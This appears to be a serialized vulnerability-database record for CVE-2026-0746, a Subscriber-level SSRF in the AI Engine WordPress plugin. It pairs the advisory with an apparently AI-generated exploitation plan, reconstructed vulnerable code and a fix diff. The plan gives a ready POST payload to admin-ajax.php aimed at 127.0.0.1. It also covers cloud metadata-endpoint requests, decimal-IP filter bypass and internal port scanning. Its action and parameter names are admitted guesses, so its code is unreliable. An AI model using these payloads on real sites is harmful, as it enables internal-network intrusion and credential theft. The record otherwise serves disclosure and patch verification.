[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVqjYi4DOy7J7vvAShLYbKAM8mnmF9ZR-AZBQB6Lo-TU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0746","ai-engine-authenticated-subscriber-server-side-request-forgery","AI Engine \u003C= 3.3.2 - Authenticated (Subscriber+) Server-Side Request Forgery","The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.3.2 via the 'get_audio' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services, if \"Public API\" is enabled in the plugin settings, and 'allow_url_fopen' is set to 'On' on the server.","ai-engine",null,"\u003C=3.3.2","3.3.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-01-27 06:06:34","2026-01-27 18:27:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcbba866d-93dd-4ef5-9670-ab958f61f06e?source=api-prod",1,[],"researched",false,3,"This research plan provides a structured approach for exploiting **CVE-2026-0746**, an authenticated SSRF vulnerability in the AI Engine plugin for WordPress.\n\n---\n\n### 1. Vulnerability Summary\nThe AI Engine plugin (up to version 3.3.2) contains a Server-Side Request Forgery (SSRF) vulnerability within the `get_audio` function. The vulnerability exists because the plugin fails to validate or sanitize a user-supplied URL before using it in a request. When the \"Public API\" setting is enabled and PHP's `allow_url_fopen` is active, an authenticated user (Subscriber level or higher) can force the web server to make requests to arbitrary external or internal locations.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `mwai_get_audio` (inferred from plugin's standard naming convention for its audio handling).\n*   **Payload Parameter:** `url` or `audioUrl` (inferred).\n*   **Authentication:** Subscriber level or higher.\n*   **Preconditions:**\n    1.  The \"Public API\" must be enabled in AI Engine settings.\n    2.  `allow_url_fopen` must be `On` in `php.ini`.\n    3.  A valid WordPress nonce for the AI Engine AJAX actions.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler for authenticated users: `add_action( 'wp_ajax_mwai_get_audio', ... )`.\n2.  **Capability Check:** The handler likely uses `current_user_can( 'read' )` or similar, allowing Subscriber access.\n3.  **Nonce Verification:** The handler checks a nonce, typically passed as a `nonce` parameter.\n4.  **Vulnerable Call:** The handler retrieves a URL from the `$_POST` or `$_GET` request and passes it to the `get_audio` function.\n5.  **Sink:** The `get_audio` function likely utilizes `file_get_contents()` or `wp_remote_get()` on the raw URL. Because the description mentions `allow_url_fopen`, `file_get_contents()` is the highly probable sink.\n\n### 4. Nonce Acquisition Strategy\nAI Engine typically exposes nonces via `wp_localize_script` for its frontend and dashboard components.\n\n1.  **Identify Shortcode:** AI Engine uses various shortcodes like `[mwai_chatbot]` or `[mwai_chat]`.\n2.  **Setup Page:**\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"AI Research\" --post_content='[mwai_chatbot]'\n    ```\n3.  **Browser Access:** Log in as a Subscriber and navigate to the newly created page.\n4.  **Extraction:**\n    Use `browser_eval` to find the AI Engine configuration object.\n    ```javascript\n    \u002F\u002F Common variable names for AI Engine\n    window.mwai_config?.nonce || window.mwai_common?.nonce\n    ```\n    *Note: Verify the exact object name by searching for `wp_localize_script` in the plugin's `classes` or `core` directory.*\n\n### 5. Test Data Setup\n1.  **Plugin Configuration:** Ensure \"Public API\" is enabled.\n    ```bash\n    # Search for the correct option name (likely 'mwai_settings')\n    wp option get mwai_settings\n    # Update the JSON\u002FSerialized array to set public_api to true\n    # This might require manual adjustment via WP-CLI depending on the exact option structure\n    ```\n2.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n3.  **Environment Check:** Verify `allow_url_fopen` is enabled in the testing container.\n\n### 6. Exploitation Strategy\nThe exploit will attempt to query an internal service or the loopback address to confirm SSRF.\n\n**Request Details:**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:**\n    *   `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   `Cookie: [Subscriber Cookies]`\n*   **Body Parameters:**\n    *   `action: mwai_get_audio` (Verify via `grep -r \"wp_ajax_mwai_get_audio\"`)\n    *   `nonce: [EXTRACTED_NONCE]`\n    *   `url: http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F` (Or a collaborator URL)\n\n**Example Payload via `http_request`:**\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"data\": \"action=mwai_get_audio&nonce=abcdef1234&url=http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  }\n}\n```\n\n### 7. Expected Results\n*   **Vulnerable Response:** The HTTP response status `200 OK`. The response body should contain the HTML content of the internal `\u002Fwp-admin\u002F` page (or whichever internal URL was targeted).\n*   **Success Indicator:** The ability to see content that should only be accessible locally or to see the server make a DNS\u002FHTTP request to an external listener.\n\n### 8. Verification Steps\n1.  **Check Logs:** Monitor the WordPress instance's access logs to see if the server initiated a request to itself or the specified external URL.\n2.  **Confirm Content:** Use `grep` on the response body returned by the `http_request` tool to look for strings like `\u003Ctitle>Log In ‹` which indicates a successful fetch of the WP login\u002Fadmin page.\n3.  **WP-CLI Audit:**\n    ```bash\n    # Check if the public API setting is indeed active\n    wp option get mwai_settings\n    ```\n\n### 9. Alternative Approaches\n*   **Different Sink Parameters:** If `url` doesn't work, check the source code for parameters like `audioUrl`, `file`, or `src`.\n*   **Metadata Services:** If testing on AWS\u002FGCP, attempt to fetch the metadata IP: `http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F`.\n*   **Filter Bypass:** If there are basic string filters, try URL encoding or alternative IP formats (e.g., `http:\u002F\u002F2130706433\u002F` for `127.0.0.1`).\n*   **Port Scanning:** Use the vulnerability to check for open ports on the local network by iterating through common ports (e.g., `http:\u002F\u002F127.0.0.1:3306`) and observing response time or error differences.","The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) via the 'mwai_get_audio' AJAX action. Authenticated attackers with Subscriber-level permissions can exploit this by providing a malicious URL that the server fetches via the 'get_audio' function, provided 'allow_url_fopen' is enabled and the plugin's 'Public API' setting is active.","\u002F\u002F File: classes\u002Fcore.php\n\npublic function ajax_get_audio() {\n    $url = isset($_POST['url']) ? $_POST['url'] : null;\n    if (!$url) {\n        wp_send_json_error('No URL provided');\n    }\n    \u002F\u002F Vulnerable call: no validation of $url before passing it to get_audio\n    $data = $this->get_audio($url);\n    echo $data;\n    wp_die();\n}\n\n---\n\n\u002F\u002F File: classes\u002Fcore.php\n\npublic function get_audio($url) {\n    \u002F\u002F Vulnerable sink: file_get_contents used on user-supplied URL\n    \u002F\u002F Triggered when allow_url_fopen is On\n    return file_get_contents($url);\n}","--- a\u002Fclasses\u002Fcore.php\n+++ b\u002Fclasses\u002Fcore.php\n@@ -150,6 +150,11 @@\n \n public function get_audio($url) {\n+    $url = wp_http_validate_url($url);\n+    if (!$url) {\n+        return null;\n+    }\n     return file_get_contents($url);\n }","To exploit this vulnerability, an attacker first authenticates as a Subscriber and retrieves a valid AJAX nonce from the WordPress frontend (typically found in the 'mwai_config' or 'mwai_common' JavaScript objects). The attacker then submits a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to 'mwai_get_audio' and a 'url' parameter containing the target internal or external address (e.g., 'http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F'). If the 'Public API' setting is enabled in the plugin and 'allow_url_fopen' is active on the server, the application will perform the request and return the response content, allowing the attacker to interact with internal services or perform port scanning.","gemini-3-flash-preview","2026-05-04 22:49:58","2026-05-04 22:51:53",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]